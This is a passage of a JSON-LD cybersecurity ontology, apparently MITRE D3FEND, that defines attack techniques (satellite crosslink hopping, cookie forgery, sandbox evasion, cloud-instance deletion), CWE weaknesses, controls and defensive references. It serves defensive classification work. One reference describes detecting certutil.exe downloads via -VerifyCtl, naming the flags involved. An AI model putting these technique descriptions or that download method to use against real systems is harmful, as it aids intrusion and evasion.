      "owl:inverseOf": {
        "@id": "d3f:may-evict"
      },
      "rdfs:label": "may-be-evicted-by",
      "rdfs:subPropertyOf": {
        "@id": "d3f:attack-may-be-countered-by"
      }
    },
    {
      "@id": "d3f:LM-0003",
      "@type": "owl:Class",
      "d3f:attack-id": "LM-0003",
      "d3f:definition": "In networks where vehicles exchange data over inter-satellite links, a compromise on one spacecraft becomes a springboard to others. The attacker crafts crosslink traffic, routing updates, service advertisements, time/ephemeris distribution, file or tasking messages, that appears to originate from a trusted neighbor and targets gateway functions that bridge crosslink traffic into command/data paths. Once accepted, those messages can queue procedures, deliver configuration/table edits, or open file transfer sessions on adjacent vehicles. In mesh or hub-and-spoke constellations, this enables “hop-by-hop” spread: a single foothold uses shared trust and protocol uniformity to reach additional satellites without contacting the ground segment.",
      "rdfs:label": "Constellation Hopping via Crosslink - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/LM-0003/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTALateralMovementTechnique"
      },
      "skos:prefLabel": "Constellation Hopping via Crosslink"
    },
    {
      "@id": "d3f:EventLogRestartEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event representing the restarting of the event logging service, often performed during system maintenance or troubleshooting.",
      "rdfs:label": "Event Log Restart Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:EventLogEvent"
        },
        {
          "@id": "_:N2d518f369ed74f9fbaaee66c767b7ed4"
        },
        {
          "@id": "_:N04a39cbfd1d34aaca7ef72661567548e"
        }
      ]
    },
    {
      "@id": "_:N2d518f369ed74f9fbaaee66c767b7ed4",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:EventLogStopEvent"
      }
    },
    {
      "@id": "_:N04a39cbfd1d34aaca7ef72661567548e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:precedes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:EventLogStartEvent"
      }
    },
    {
      "@id": "d3f:RegSetKeyValueA",
      "@type": [
        "owl:NamedIndividual",
        "d3f:SetSystemConfigValue"
      ],
      "rdfs:label": "RegSetKeyValueA"
    },
    {
      "@id": "d3f:T1606.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1606.001",
      "d3f:definition": "Adversaries may forge web cookies that can be used to gain access to web applications or Internet services. Web applications and services (hosted in cloud SaaS environments or on-premise servers) often use session cookies to authenticate and authorize user access.",
      "d3f:forges": {
        "@id": "d3f:SessionCookie"
      },
      "rdfs:label": "Web Cookies",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1606"
        },
        {
          "@id": "_:Nd026826e170d43a9986f9af894552d34"
        }
      ]
    },
    {
      "@id": "_:Nd026826e170d43a9986f9af894552d34",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:forges"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SessionCookie"
      }
    },
    {
      "@id": "d3f:Reference-FirmwareBehaviorAnalysisVIPER",
      "@type": [
        "owl:NamedIndividual",
        "d3f:AcademicPaperReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://dl.acm.org/doi/pdf/10.1145/2046707.2046711"
      },
      "d3f:kb-abstract": "Recent research demonstrates that malware can infect peripherals' firmware in a typical x86 computer system, e.g., by exploiting vulnerabilities in the firmware itself or in the firmware update tools. Verifying the integrity of peripherals' firmware is thus an important challenge. We propose software-only attestation protocols to verify the integrity of peripherals' firmware, and show that they can detect all known software-based attacks.",
      "d3f:kb-author": "Yanlin Li, Jonathan M. McCune, Adrian Perrig",
      "d3f:kb-organization": "CyLab, Carnegie Mellon University",
      "d3f:kb-reference-of": {
        "@id": "d3f:FirmwareBehaviorAnalysis"
      },
      "d3f:kb-reference-title": "VIPER: Verifying the Integrity of PERipherals' Firmware",
      "rdfs:label": "Reference - Firmware Behavior Analysis VIPER"
    },
    {
      "@id": "d3f:SymmetricKey",
      "@type": "owl:Class",
      "d3f:definition": "A symmetric key is a single key used for both encryption and decryption and used with a symmetric-key algorithm. Symmetric-key algorithms are algorithms for cryptography that use the same cryptographic keys for both encryption of plaintext and decryption of ciphertext. The keys may be identical or there may be a simple transformation to go between the two keys. The keys, in practice, represent a shared secret between two or more parties that can be used to maintain a private information link. This requirement that both parties have access to the secret key is one of the main drawbacks of symmetric key encryption, in comparison to public-key encryption (also known as asymmetric key encryption).",
      "rdfs:label": "Symmetric Key",
      "rdfs:seeAlso": {
        "@id": "dbr:Symmetric-key_algorithm"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:CryptographicKey"
      }
    },
    {
      "@id": "d3f:NetworkFileResource",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:File"
      },
      "d3f:definition": "A computer file resource made available from one host to other hosts on a computer network.",
      "rdfs:label": "Network File Resource",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkFileShareResource"
        },
        {
          "@id": "_:Naa3072c80c8549c9a76933122bc0cc47"
        }
      ]
    },
    {
      "@id": "_:Naa3072c80c8549c9a76933122bc0cc47",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "d3f:OTErrorMessage",
      "@type": "owl:Class",
      "d3f:definition": "An anticipated, reproducible defect occurred within the system.",
      "rdfs:comment": "BACnet: Error: 1\nBACnet: Error: 2\nBACnet: Error: 3\nBACnet: Error: 4\nBACnet: Error: 5\nBACnet: Error: 6\nBACnet: Error: 7\nBACnet: Error: 8",
      "rdfs:label": "OT Error Message",
      "rdfs:seeAlso": [
        {
          "@id": "https://icscsi.org/library/Documents/ICS_Protocols/Control%20Microsystems%20-%20DNP3%20User%20and%20Reference%20Manual.pdf"
        },
        {
          "@id": "https://modbus.org/docs/Modbus_Application_Protocol_V1_1b3.pdf"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/TechnicalNotes/NIST.TN.2023.pdf"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:OTDiagnosticsMessage"
      }
    },
    {
      "@id": "d3f:CWE-910",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-910",
      "d3f:definition": "The product uses or accesses a file descriptor after it has been closed.",
      "d3f:synonym": "Stale file descriptor",
      "rdfs:label": "Use of Expired File Descriptor",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-672"
      }
    },
    {
      "@id": "d3f:T1412",
      "@type": "owl:Class",
      "d3f:attack-id": "T1412",
      "d3f:definition": "A malicious application could capture sensitive data sent via SMS, including authentication credentials. SMS is frequently used to transmit codes used for multi-factor authentication.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1636.004",
      "rdfs:label": "Capture SMS Messages - ATTACK Mobile",
      "rdfs:seeAlso": {
        "@id": "d3f:T1636.004"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileCollectionTechnique"
        },
        {
          "@id": "d3f:ATTACKMobileCredentialAccessTechnique"
        }
      ],
      "skos:prefLabel": "Capture SMS Messages"
    },
    {
      "@id": "d3f:K-meansClustering",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-KMC",
      "d3f:definition": "The K-means algorithm identifies k centroids and then allocates every data point to the nearest cluster, while keeping the distance between each data point and its cluster's centroid as small as possible.",
      "d3f:kb-article": "## References\nTowards Data Science. (n.d.). Understanding K-means Clustering in Machine Learning. [Link](https://towardsdatascience.com/understanding-k-means-clustering-in-machine-learning-6a6e67336aa1)",
      "rdfs:label": "K-means Clustering",
      "rdfs:subClassOf": {
        "@id": "d3f:Centroid-basedClustering"
      }
    },
    {
      "@id": "d3f:CWE-245",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-245",
      "d3f:definition": "The J2EE application directly manages connections, instead of using the container's connection management facilities.",
      "rdfs:label": "J2EE Bad Practices: Direct Management of Connections",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-695"
      }
    },
    {
      "@id": "d3f:Reference-MethodAndSystemForDetectingMaliciousPayloads_VectraNetworksInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/EP3293937A1/en?oq=EP-3293937-A1"
      },
      "d3f:kb-abstract": "Disclosed is an improved method, system, and computer program product for identifying malicious payloads. The disclosed approach identifies potentially malicious payload exchanges which may be associated with payload injection or root-kit magic key usage.\n\nSome examples of data inputs:\n    Information for clients and servers, such as IP address and host information\n    Payloads for both clients and servers\n    Amount of data being transferred\n    Duration of communications\n    Length of time delay between client request and server response",
      "d3f:kb-author": "Nicolas Beauchesne; John Steven Mancini",
      "d3f:kb-mitre-analysis": "Extraction of network flow data and using unsupervised machine learning to create a standard baseline. During the monitoring phase, abnormal network metadata will result in an alert.",
      "d3f:kb-organization": "Vectra Networks Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:Client-serverPayloadProfiling"
      },
      "d3f:kb-reference-title": "Method and system for detecting malicious payloads",
      "rdfs:label": "Reference - Method and system for detecting malicious payloads - Vectra Networks Inc"
    },
    {
      "@id": "d3f:CCI-001128_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:EncryptedTunnels"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization employs cryptographic mechanisms to recognize changes to information during transmission unless otherwise protected by alternative physical measures.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-21T00:00:00"
      },
      "rdfs:label": "CCI-001128"
    },
    {
      "@id": "d3f:T0820",
      "@type": "owl:Class",
      "d3f:attack-id": "T0820",
      "d3f:definition": "Adversaries may exploit a software vulnerability to take advantage of a programming error in a program, service, or within the operating system software or kernel itself to evade detection. Vulnerabilities may exist in software that can be used to disable or circumvent security features.",
      "rdfs:label": "Exploitation for Evasion - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSEvasionTechnique"
      },
      "skos:prefLabel": "Exploitation for Evasion"
    },
    {
      "@id": "d3f:CWE-290",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-290",
      "d3f:definition": "This attack-focused weakness is caused by incorrectly implemented authentication schemes that are subject to spoofing attacks.",
      "rdfs:label": "Authentication Bypass by Spoofing",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1390"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_CM-5_5",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Access Restrictions for Change | Privilege Limitation for Production and Operation",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:LocalAccountMonitoring"
        },
        {
          "@id": "d3f:SystemConfigurationPermissions"
        }
      ],
      "rdfs:label": "CM-5(5)"
    },
    {
      "@id": "d3f:CWE-167",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-167",
      "d3f:definition": "The product receives input from an upstream component, but it does not handle or incorrectly handles when an additional unexpected special element is provided.",
      "rdfs:label": "Improper Handling of Additional Special Element",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-159"
        },
        {
          "@id": "d3f:CWE-228"
        },
        {
          "@id": "d3f:CWE-703"
        }
      ]
    },
    {
      "@id": "d3f:CompilerConfigurationFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A file containing information used to configure the parameters and initial settings for a compiler.",
      "rdfs:label": "Compiler Configuration File",
      "rdfs:subClassOf": {
        "@id": "d3f:ApplicationConfigurationFile"
      }
    },
    {
      "@id": "d3f:T1670",
      "@type": "owl:Class",
      "d3f:attack-id": "T1670",
      "d3f:definition": "Adversaries may carry out malicious operations using virtualization solutions to escape from Android sandboxes and to avoid detection. Android uses sandboxes to separate resources and code execution between applications and the operating system.(Citation: Android Application Sandbox) There are a few virtualization solutions available on Android, such as the Android Virtualization Framework (AVF).(Citation: Android AVF Overview)",
      "rdfs:label": "Virtualization Solution - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileDefenseEvasionTechnique"
      },
      "skos:prefLabel": "Virtualization Solution"
    },
    {
      "@id": "d3f:T1578.003",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1578.003",
      "d3f:definition": "An adversary may delete a cloud instance after they have performed malicious activities in an attempt to evade detection and remove evidence of their presence.  Deleting an instance or virtual machine can remove valuable forensic artifacts and other evidence of suspicious behavior if the instance is not recoverable.",
      "d3f:deletes": [
        {
          "@id": "d3f:CloudInstanceMetadata"
        },
        {
          "@id": "d3f:Host"
        }
      ],
      "rdfs:label": "Delete Cloud Instance",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1578"
        },
        {
          "@id": "_:N4a47b47511a34c5cacd3c62abf755b5f"
        },
        {
          "@id": "_:N67604e84833f4f81aad7196b80c3dc64"
        }
      ]
    },
    {
      "@id": "_:N4a47b47511a34c5cacd3c62abf755b5f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:deletes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CloudInstanceMetadata"
      }
    },
    {
      "@id": "_:N67604e84833f4f81aad7196b80c3dc64",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:deletes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Host"
      }
    },
    {
      "@id": "d3f:TechniqueReference",
      "@type": "owl:Class",
      "d3f:definition": "A reference used to develop KB articles.",
      "d3f:pref-label": "Technique Reference",
      "rdfs:label": "Technique Reference",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:D3FENDKBThing"
        },
        {
          "@id": "_:N1f879e5b0d9b41bcad9b765f22440629"
        },
        {
          "@id": "_:Nd80491c3c83a43d1b7daebb92d462b9f"
        },
        {
          "@id": "_:N3ded7b369315463ca35a736e29fcf4a9"
        }
      ]
    },
    {
      "@id": "_:N1f879e5b0d9b41bcad9b765f22440629",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:kb-reference-of"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DefensiveTechnique"
      }
    },
    {
      "@id": "_:Nd80491c3c83a43d1b7daebb92d462b9f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-link"
      },
      "owl:someValuesFrom": {
        "@id": "xsd:anyURI"
      }
    },
    {
      "@id": "_:N3ded7b369315463ca35a736e29fcf4a9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:kb-reference-title"
      },
      "owl:someValuesFrom": {
        "@id": "xsd:string"
      }
    },
    {
      "@id": "d3f:HTTPURL",
      "@type": [
        "owl:NamedIndividual",
        "d3f:URL"
      ],
      "rdfs:label": "HTTP URL"
    },
    {
      "@id": "d3f:rating",
      "@type": [
        "owl:DatatypeProperty",
        "owl:FunctionalProperty"
      ],
      "rdfs:label": "rating",
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-catalog-data-property"
      }
    },
    {
      "@id": "d3f:Reference-CAR-2021-05-007%3ACertUtilDownloadWithVerifyCtlAndSplitArguments_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2021-05-007/"
      },
      "d3f:kb-abstract": "Certutil.exe may download a file from a remote destination using -VerifyCtl. This behavior does require a URL to be passed on the command-line. In addition, -f (force) and -split (Split embedded ASN.1 elements, and save to files) will be used. It is not entirely common for certutil.exe to contact public IP space. During triage, capture any files on disk and review. Review the reputation of the remote IP or domain in question. Using -VerifyCtl, the file will either be written to the current working directory or %APPDATA%\\..\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\<hash>.",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessSpawnAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2021-05-007: CertUtil Download With VerifyCtl and Split Arguments",
      "rdfs:label": "Reference - CAR-2021-05-007: CertUtil Download With VerifyCtl and Split Arguments - MITRE"
    },
    {
      "@id": "d3f:EmbeddedDatabaseApplication",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A software application that integrates a database management system (DBMS) directly within its own structure, rather than relying on a separate, standalone database server. Examples include SQLite and Berkeley DB.",
      "d3f:executes": {
        "@id": "d3f:DatabaseQuery"
      },
      "d3f:manages": {
        "@id": "d3f:Database"
      },
      "rdfs:label": "Embedded Database Application",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DatabaseApplication"
        },
        {
          "@id": "_:Na98e6c58c3654bc0ac4fc94f86c2f353"
        },
        {
          "@id": "_:N0e1b55b6e2aa40b7accd312fd0d44610"
        }
      ]
    },
    {
      "@id": "_:Na98e6c58c3654bc0ac4fc94f86c2f353",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:executes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DatabaseQuery"
      }
    },
    {
      "@id": "_:N0e1b55b6e2aa40b7accd312fd0d44610",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:manages"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Database"
      }
    },
    {
      "@id": "d3f:Reference-Wikipedia-ProximityCard",
      "@type": [
        "owl:NamedIndividual",
        "d3f:InternetArticleReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://en.wikipedia.org/wiki/Proximity_card"
      },
      "d3f:kb-abstract": "Overview of proximity cards used in access control, their operating principles, and security aspects.",
      "d3f:kb-author": "Wikipedia contributors",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProximitySensorMonitoring"
      },
      "d3f:kb-reference-title": "Proximity card",
      "rdfs:label": "Reference - Wikipedia: Proximity card"
    },
    {
      "@id": "d3f:DS0022",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseDataSource"
      ],
      "d3f:definition": "A computer resource object, managed by the I/O system, for storing data (such as images, text, videos, computer programs, or any wide variety of other media)",
      "d3f:narrower": {
        "@id": "d3f:FileSystemMetadata"
      },
      "rdfs:comment": "The digital artifact mapping for this data source is only applicable to the File Metadata component",
      "rdfs:label": "File (ATT&CK DS)"
    },
    {
      "@id": "d3f:T1429",
      "@type": "owl:Class",
      "d3f:attack-id": "T1429",
      "d3f:definition": "Adversaries may capture audio to collect information by leveraging standard operating system APIs of a mobile device. Examples of audio information adversaries may target include user conversations, surroundings, phone calls, or other sensitive information.",
      "rdfs:label": "Audio Capture - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileCollectionTechnique"
      },
      "skos:prefLabel": "Audio Capture"
    },
    {
      "@id": "d3f:OTDeviceFirmwareCommand",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Interact with the software responsible for low-level control of the system.",
      "rdfs:label": "OT Device Firmware Command",
      "rdfs:seeAlso": [
        {
          "@id": "https://icscsi.org/library/Documents/ICS_Protocols/Control%20Microsystems%20-%20DNP3%20User%20and%20Reference%20Manual.pdf"
        },
        {
          "@id": "https://modbus.org/docs/Modbus_Application_Protocol_V1_1b3.pdf"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/TechnicalNotes/NIST.TN.2023.pdf"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:OTDeviceManagementMessage"
      }
    },
    {
      "@id": "d3f:FileUpdateEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event involving changes to the content or metadata of an existing file, reflecting updates that alter its state or properties.",
      "rdfs:label": "File Update Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:FileEvent"
        },
        {
          "@id": "_:Nebf9fa702a36433ea824f8fb021182b2"
        },
        {
          "@id": "_:N0a3dd4b9491f49458ee6cb08ea6c036b"
        }
      ]
    },
    {
      "@id": "_:Nebf9fa702a36433ea824f8fb021182b2",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FileAccessEvent"
      }
    },
    {
      "@id": "_:N0a3dd4b9491f49458ee6cb08ea6c036b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FileCreationEvent"
      }
    },
    {
      "@id": "d3f:CWE-863",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-863",
      "d3f:definition": "The product performs an authorization check when an actor attempts to access a resource or perform an action, but it does not correctly perform the check.",
      "d3f:synonym": "AuthZ",
      "rdfs:label": "Incorrect Authorization",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-285"
      }
    },
    {
      "@id": "d3f:T1497.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1497.002",
      "d3f:definition": "Adversaries may employ various user activity checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)",
      "rdfs:label": "User Activity Based Checks",
      "rdfs:subClassOf": {
        "@id": "d3f:T1497"
      }
    },
    {
      "@id": "d3f:NonlinearRegressionLearning",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-NRL",
      "d3f:definition": "A supervised learning method that builds a non-linear regression model using training data.",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Nonlinear regression. [Link](https://en.wikipedia.org/wiki/Nonlinear_regression)",
      "rdfs:label": "Nonlinear Regression Learning",
      "rdfs:seeAlso": {
        "@id": "d3f:NonlinearRegression"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:RegressionAnalysisLearning"
      }
    },
    {
      "@id": "d3f:T1098.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1098.001",
      "d3f:creates": {
        "@id": "d3f:Credential"
      },
      "d3f:definition": "Adversaries may add adversary-controlled credentials to a cloud account to maintain persistent access to victim accounts and instances within the environment.",
      "d3f:produces": {
        "@id": "d3f:IntranetAdministrativeNetworkTraffic"
      },
      "rdfs:label": "Additional Cloud Credentials",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1098"
        },
        {
          "@id": "_:N57c59c9e05a34b36b934a9b3eaef3e91"
        },
        {
          "@id": "_:Nde21de28809e47afbdfc7d0562ed24d7"
        }
      ]
    },
    {
      "@id": "_:N57c59c9e05a34b36b934a9b3eaef3e91",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:creates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Credential"
      }
    },
    {
      "@id": "_:Nde21de28809e47afbdfc7d0562ed24d7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:IntranetAdministrativeNetworkTraffic"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_MA-3_5",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Maintenance Tools | Execution with Privilege",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": {
        "@id": "d3f:UserAccountPermissions"
      },
      "rdfs:label": "MA-3(5)"
    },
    {
      "@id": "d3f:HTTPResponseEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where an HTTP response is sent from a server to a client over an established TCP connection.",
      "rdfs:label": "HTTP Response Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:HTTPEvent"
        },
        {
          "@id": "_:Nd3b45b2e0ac34ccfb034bc101237610b"
        }
      ]
    },
    {
      "@id": "_:Nd3b45b2e0ac34ccfb034bc101237610b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:HTTPRequestEvent"
      }
    },
    {
      "@id": "d3f:CWE-1336",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1336",
      "d3f:definition": "The product uses a template engine to insert or process externally-influenced input, but it does not neutralize or incorrectly neutralizes special elements or syntax that can be interpreted as template expressions or other code directives when processed by the engine.",
      "d3f:synonym": [
        "Client-Side Template Injection / CSTI",
        "Server-Side Template Injection / SSTI"
      ],
      "rdfs:label": "Improper Neutralization of Special Elements Used in a Template Engine",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-94"
      }
    },
    {
      "@id": "d3f:RD-0001",
      "@type": "owl:Class",
      "d3f:attack-id": "RD-0001",
      "d3f:definition": "Adversaries assemble the people, platforms, and plumbing they will later use to observe, reach, or impersonate mission components. Infrastructure spans RF and optical ground assets (antennas, modems, timing sources, front-ends), compute and storage (on-prem and cloud), network presence (leased ASNs/IP space, VPS fleets, CDN relays), identity fabric (burner accounts, domains, certificates), and fabrication/test environments for hardware and software. They favor assets that are inexpensive, deniable, and geographically diverse, mixing self-hosted gear with commercial services and compromised third-party systems. To support spacecraft operations, they may build SDR-based labs that replicate waveforms and framing, stage command/telemetry tooling behind traffic mixers, and pre-position data pipelines for collection and analysis. The objective is persistence and flexibility: the ability to pivot between reconnaissance, delivery, and command with minimal attribution risk.",
      "rdfs:label": "Acquire Infrastructure - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/RD-0001/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAResourceDevelopmentTechnique"
      },
      "skos:prefLabel": "Acquire Infrastructure"
    },
    {
      "@id": "d3f:UserGroup",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:UserAccount"
      },
      "d3f:definition": "User groups are a way to collect user accounts and/or computer accounts into manageable units. Administrators can assign permissions, roles, or access to resources, as well as modify group membership, depending on the operating system.",
      "d3f:synonym": "Security Group",
      "rdfs:label": "User Group",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:AccessControlGroup"
        },
        {
          "@id": "_:N36a7b19de33a4e11ac26d34f20b0d03c"
        }
      ]
    },
    {
      "@id": "_:N36a7b19de33a4e11ac26d34f20b0d03c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserAccount"
      }
    },
    {
      "@id": "d3f:T1021.003",
      "@type": "owl:Class",
      "d3f:attack-id": "T1021.003",
      "d3f:definition": "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote machines by taking advantage of Distributed Component Object Model (DCOM). The adversary may then perform actions as the logged-on user.",
      "rdfs:label": "Distributed Component Object Model",
      "rdfs:subClassOf": {
        "@id": "d3f:T1021"
      }
    },
    {
      "@id": "d3f:CWE-1255",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1255",
      "d3f:definition": "A device's real time power consumption may be monitored during security token evaluation and the information gleaned may be used to determine the value of the reference token.",
      "rdfs:label": "Comparison Logic is Vulnerable to Power Side-Channel Attacks",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1300"
      }
    },
    {
      "@id": "d3f:DS0024",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseDataSource"
      ],
      "d3f:definition": "A Windows OS hierarchical database that stores much of the information and settings for software programs, hardware devices, user preferences, and operating-system configurations.",
      "rdfs:comment": "This data source captures events relating to Windows registry keys and values and therefore has no direct mappings to digital artifacts.",
      "rdfs:label": "Windows Registry (ATT&CK DS)"
    },
    {
      "@id": "d3f:T1532",
      "@type": "owl:Class",
      "d3f:attack-id": "T1532",
      "d3f:definition": "Adversaries may compress and/or encrypt data that is collected prior to exfiltration. Compressing data can help to obfuscate its contents and minimize use of network resources. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.",
      "rdfs:label": "Archive Collected Data - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileCollectionTechnique"
      },
      "skos:prefLabel": "Archive Collected Data"
    },
    {
      "@id": "d3f:CWE-168",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-168",
      "d3f:definition": "The product does not properly handle input in which an inconsistency exists between two or more special characters or reserved words.",
      "rdfs:label": "Improper Handling of Inconsistent Special Elements",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-159"
        },
        {
          "@id": "d3f:CWE-228"
        },
        {
          "@id": "d3f:CWE-703"
        }
      ]
    },
    {
      "@id": "d3f:CWE-1252",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1252",
      "d3f:definition": "The CPU is not configured to provide hardware support for exclusivity of write and execute operations on memory. This allows an attacker to execute data from all of memory.",
      "rdfs:label": "CPU Hardware Not Configured to Support Exclusivity of Write and Execute Operations",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-284"
      }
    },
    {
      "@id": "d3f:M1030",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseMitigation"
      ],
      "d3f:related": [
